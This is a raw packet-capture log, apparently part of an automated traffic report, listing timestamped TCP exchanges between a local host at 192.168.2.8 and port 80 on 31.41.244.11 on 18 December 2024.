                                                                                                                                                                                          Dec 18, 2024 09:07:31.791878939 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.791892052 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.791930914 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.792736053 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.792781115 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.792898893 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.792938948 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.793788910 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.793836117 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.793890953 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.793936014 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.794826031 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.794897079 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.794992924 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.795033932 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.795798063 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.795860052 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.795861006 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.795893908 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.796951056 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.797044992 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.935412884 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.935453892 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.935492992 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.935542107 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.935854912 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.935866117 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.935931921 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.936857939 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.936908007 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.937047958 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.937093019 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.937942028 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.937952995 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.937989950 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.939384937 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.939395905 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.939426899 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.939445019 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.939858913 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.939898968 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.939966917 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.940005064 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.940845966 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.940892935 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.941001892 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.941046953 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.941898108 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.941939116 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.942104101 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.942142963 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.943037033 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.943082094 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.943084955 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.943121910 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.943905115 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.943957090 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.943989038 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.944083929 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.945091009 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.945101976 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.945153952 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.946008921 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.946018934 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.946048021 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.946074009 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.947016954 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.947027922 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.947072029 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.948074102 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.948143005 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.948143959 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.948189020 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.949155092 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.949166059 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.949194908 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.949219942 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.949953079 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.950043917 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.950083017 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.951289892 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.951301098 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.951332092 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.951345921 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.952346087 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.952356100 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.952390909 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.953351021 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.953361988 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.953403950 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.954355955 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.954365969 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.954391956 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.954406023 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.955169916 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.955183029 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.955212116 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.955225945 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.956809044 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.956820011 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.956845999 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.956865072 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.957422972 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.957432985 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.957475901 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.958126068 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.958206892 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.958494902 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.958554029 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.959089994 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.959130049 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.959191084 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.959227085 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.960238934 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.960285902 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.960346937 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.960381985 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.961122990 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.961158991 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.961317062 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.961359978 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.962126017 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.962171078 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.962233067 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.962310076 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.963201046 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.963342905 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.963382006 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.964143991 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.964189053 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.964307070 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.964345932 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.965213060 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.965269089 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.965332985 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.965369940 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.966145039 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.966192007 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.966214895 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.966259956 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.967189074 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.967236996 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.967323065 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.967363119 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.968259096 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.968278885 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.968316078 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.968316078 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.969233036 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.969274998 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.969299078 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.969336033 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.970216036 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.970330954 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.970362902 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.970583916 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.971260071 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.971302032 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.971338987 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.971384048 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.972301960 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.972320080 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.972372055 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.972387075 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.973331928 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.973342896 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.973381996 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.973397970 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.974278927 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.974319935 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.974406004 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.974447966 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.975305080 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.975347042 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.975373983 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.975414038 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.976243019 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.976285934 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.976356983 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.976403952 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.977281094 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.977335930 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.977371931 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.977406025 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.978364944 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.978405952 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.978445053 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.979365110 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.979432106 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.979466915 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.980299950 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.980344057 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.980432987 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.980468035 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.981400013 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.981410980 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.981445074 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.982465029 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.982475042 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.982501984 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.982531071 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.983349085 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.983416080 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.983447075 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.983494997 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.984369993 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.984437943 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.984472990 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.984508991 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.985433102 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.985476971 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.985505104 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.985505104 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.986511946 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.986531973 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.986578941 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.987390041 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.987548113 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.987554073 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.987596035 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.988444090 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.988558054 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.126813889 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.126837015 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.126879930 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.126943111 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.127254009 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.127264977 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.127283096 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.127301931 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.127340078 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.128694057 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.128705978 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.128756046 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.129090071 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.129134893 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.129368067 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.129416943 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.130103111 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.130146980 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.130292892 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.130333900 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.131136894 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.131181955 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.131236076 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.131298065 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.132183075 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.132247925 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.132266998 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.132285118 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.133172035 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.133219957 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.133241892 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.133277893 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.134119034 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.134166956 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.134206057 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.134254932 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.135283947 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.135293961 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.135334015 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.136466026 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.136476994 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.136524916 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.137315035 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.137326002 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.137371063 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.138505936 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.138516903 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.138566971 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.139364958 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.139374971 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.139410973 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.140718937 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.140729904 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.140778065 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.141577959 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.141588926 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.141621113 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.142831087 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.142842054 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.142887115 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.143373966 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.143384933 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.143415928 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.143438101 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.144287109 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.144331932 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.144947052 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.145008087 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.145287991 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.145384073 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.145409107 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.145445108 CET4972080192.168.2.831.41.244.11
